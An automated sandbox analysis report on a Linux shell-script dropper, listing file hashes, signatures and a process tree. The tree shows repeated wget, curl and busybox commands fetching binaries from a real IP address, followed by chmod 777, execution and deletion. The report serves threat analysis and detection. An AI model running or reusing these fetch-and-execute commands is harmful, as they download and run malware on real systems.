Analysis
-
max time kernel
38s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
25/10/2024, 01:08
Static task
static1
Behavioral task
behavioral1
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh
-
Size
10KB
-
MD5
28e68f4a8e17f58eb03239953a34f7e6
-
SHA1
ab686c91da287340dad814683646a6b42978b168
-
SHA256
ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f
-
SHA512
ad6c64228000359844d7cbf7134a85387cef19f1f8d10ee5fb2c649958583cabe83458cc1a0785876804db6f37239ce2a7548eca8ad5c6aca61903a7de19b09f
-
SSDEEP
192:W0H2erUorJWr9dhjRxANRbqck7YcxQE/gYXYMpAAd5MUbYsyck7YcvQE/gYRYMp9:W0H2erUorEr9dkQYMpAAd5MUbYsMYMp9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1603 chmod 1615 chmod 1627 chmod 1635 chmod 1519 chmod 1555 chmod 1531 chmod 1549 chmod 1591 chmod 1609 chmod 1659 chmod 1507 chmod 1513 chmod 1641 chmod 1653 chmod 1543 chmod 1585 chmod 1597 chmod 1665 chmod 1537 chmod 1573 chmod 1671 chmod 1567 chmod 1579 chmod 1621 chmod 1647 chmod 1525 chmod 1561 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN 1508 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN /tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS 1514 PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS /tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE 1520 hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE /tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX 1526 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX /tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk 1532 MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk /tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p 1538 g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p /tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 1544 qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 /tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd 1550 tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd /tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk 1556 mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk /tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc 1562 tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc /tmp/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG 1568 fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG /tmp/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe 1574 Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe /tmp/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8 1580 DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8 /tmp/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP 1586 eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP /tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk 1592 mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk /tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc 1598 tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc /tmp/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG 1604 fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG /tmp/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe 1610 Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe /tmp/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8 1616 DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8 /tmp/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP 1622 eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP /tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS 1628 PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS /tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE 1636 hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE /tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX 1642 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX /tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk 1648 MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk /tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN 1654 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN /tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p 1660 g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p /tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 1666 qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 /tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd 1672 tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd -
System Network Configuration Discovery 1 TTPs 20 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1600 wget 1650 wget 1501 wget 1505 curl 1569 rm 1602 busybox 1604 fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG 1651 curl 1654 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN 1566 busybox 1568 fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG 1509 rm 1564 wget 1565 curl 1601 curl 1605 rm 1652 busybox 1506 busybox 1508 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN 1655 rm -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP curl File opened for modification /tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd curl File opened for modification /tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS curl File opened for modification /tmp/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG curl File opened for modification /tmp/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8 curl File opened for modification /tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE curl File opened for modification /tmp/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe curl File opened for modification /tmp/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8 curl File opened for modification /tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd curl File opened for modification /tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk curl File opened for modification /tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS curl File opened for modification /tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX curl File opened for modification /tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk curl File opened for modification /tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN curl File opened for modification /tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 curl File opened for modification /tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc curl File opened for modification /tmp/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe curl File opened for modification /tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk curl File opened for modification /tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc curl File opened for modification /tmp/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP curl File opened for modification /tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN curl File opened for modification /tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p curl File opened for modification /tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk curl File opened for modification /tmp/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG curl File opened for modification /tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE curl File opened for modification /tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX curl File opened for modification /tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p curl File opened for modification /tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1 curl
Processes
-
/tmp/ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh/tmp/ed5983e9e277434326f38c82c7ff7225bb0b45e772d34f74927ccf230df5061f.sh1⤵PID:1499
-
/bin/rm/bin/rm bins.sh2⤵PID:1500
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:1501
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1505
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:1506
-
-
/bin/chmodchmod 777 eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- File and Directory Permissions Modification
PID:1507
-
-
/tmp/eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN./eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1508
-
-
/bin/rmrm eVtr6mKsWhWZHqNDTUIfb56jIpOHbJT8dN2⤵
- System Network Configuration Discovery
PID:1509
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:1510
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Writes file to tmp directory
PID:1511
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:1512
-
-
/bin/chmodchmod 777 PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS./PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Executes dropped EXE
PID:1514
-
-
/bin/rmrm PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:1515
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:1516
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Writes file to tmp directory
PID:1517
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:1518
-
-
/bin/chmodchmod 777 hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE./hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Executes dropped EXE
PID:1520
-
-
/bin/rmrm hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:1521
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:1522
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:1524
-
-
/bin/chmodchmod 777 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX./7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵
- Executes dropped EXE
PID:1526
-
-
/bin/rmrm 7A86DeMd4acKUC2E3HSlOl2lkPsS47gbeX2⤵PID:1527
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:1528
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:1530
-
-
/bin/chmodchmod 777 MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk./MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵
- Executes dropped EXE
PID:1532
-
-
/bin/rmrm MUjlvGgt0notVYjDV6ojxgyrJKDJYWUxSk2⤵PID:1533
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:1534
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Writes file to tmp directory
PID:1535
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:1536
-
-
/bin/chmodchmod 777 g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p./g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵
- Executes dropped EXE
PID:1538
-
-
/bin/rmrm g8jQpnSjblf2nc9T1hTeufDqabQ7fNV62p2⤵PID:1539
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:1540
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Writes file to tmp directory
PID:1541
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:1542
-
-
/bin/chmodchmod 777 qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD1./qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵
- Executes dropped EXE
PID:1544
-
-
/bin/rmrm qVCNSv8UqLWBngnz9l4t30JMgGY2Rq3jD12⤵PID:1545
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:1546
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Writes file to tmp directory
PID:1547
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:1548
-
-
/bin/chmodchmod 777 tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd./tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵
- Executes dropped EXE
PID:1550
-
-
/bin/rmrm tX9G9aOCzZY4cqoQDtolTXKngySt0UTRKd2⤵PID:1551
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:1552
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Writes file to tmp directory
PID:1553
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:1554
-
-
/bin/chmodchmod 777 mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk./mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Executes dropped EXE
PID:1556
-
-
/bin/rmrm mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:1557
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:1558
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Writes file to tmp directory
PID:1559
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:1560
-
-
/bin/chmodchmod 777 tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc./tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Executes dropped EXE
PID:1562
-
-
/bin/rmrm tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:1563
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:1564
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1565
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:1566
-
-
/bin/chmodchmod 777 fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG./fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1568
-
-
/bin/rmrm fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:1569
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:1570
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- Writes file to tmp directory
PID:1571
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:1572
-
-
/bin/chmodchmod 777 Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe./Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- Executes dropped EXE
PID:1574
-
-
/bin/rmrm Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:1575
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:1576
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- Writes file to tmp directory
PID:1577
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:1578
-
-
/bin/chmodchmod 777 DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8./DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- Executes dropped EXE
PID:1580
-
-
/bin/rmrm DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:1581
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:1582
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- Writes file to tmp directory
PID:1583
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:1584
-
-
/bin/chmodchmod 777 eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP./eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- Executes dropped EXE
PID:1586
-
-
/bin/rmrm eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:1587
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:1588
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Writes file to tmp directory
PID:1589
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:1590
-
-
/bin/chmodchmod 777 mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- File and Directory Permissions Modification
PID:1591
-
-
/tmp/mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk./mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵
- Executes dropped EXE
PID:1592
-
-
/bin/rmrm mqqXDH3HRvjR93ZHYP4sJUcKXHneUl4EWk2⤵PID:1593
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:1594
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Writes file to tmp directory
PID:1595
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:1596
-
-
/bin/chmodchmod 777 tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- File and Directory Permissions Modification
PID:1597
-
-
/tmp/tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc./tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵
- Executes dropped EXE
PID:1598
-
-
/bin/rmrm tWWQiePOzf8RWcFnZrd9LCHYyIdOFFNRLc2⤵PID:1599
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:1600
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1601
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:1602
-
-
/bin/chmodchmod 777 fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- File and Directory Permissions Modification
PID:1603
-
-
/tmp/fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG./fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1604
-
-
/bin/rmrm fWgYrQPdDTedb2f11EKrUil3qMVvf1zIPG2⤵
- System Network Configuration Discovery
PID:1605
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:1606
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- Writes file to tmp directory
PID:1607
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:1608
-
-
/bin/chmodchmod 777 Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- File and Directory Permissions Modification
PID:1609
-
-
/tmp/Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe./Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵
- Executes dropped EXE
PID:1610
-
-
/bin/rmrm Oi8Cu9hsBxcn4q645dRIgo3fwlEdpcDYYe2⤵PID:1611
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:1612
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- Writes file to tmp directory
PID:1613
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:1614
-
-
/bin/chmodchmod 777 DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- File and Directory Permissions Modification
PID:1615
-
-
/tmp/DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe8./DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵
- Executes dropped EXE
PID:1616
-
-
/bin/rmrm DJ6Q1y1n31SzGG4gOAQeNexOMIIwZJtNe82⤵PID:1617
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:1618
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- Writes file to tmp directory
PID:1619
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:1620
-
-
/bin/chmodchmod 777 eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- File and Directory Permissions Modification
PID:1621
-
-
/tmp/eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP./eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵
- Executes dropped EXE
PID:1622
-
-
/bin/rmrm eObpyNsrpZ5L9DkveyNOKyKZneIY0DdQjP2⤵PID:1623
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:1624
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Writes file to tmp directory
PID:1625
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:1626
-
-
/bin/chmodchmod 777 PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- File and Directory Permissions Modification
PID:1627
-
-
/tmp/PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS./PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵
- Executes dropped EXE
PID:1628
-
-
/bin/rmrm PV8F9E62o6MR4SaqyHPabm8rsZZwUfSBKS2⤵PID:1629
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵PID:1630
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hHh8KEsNkv2eiUI6TLA5Vu57y7Szx2ihoE2⤵
- Writes file to tmp directory
PID:1631
-
-
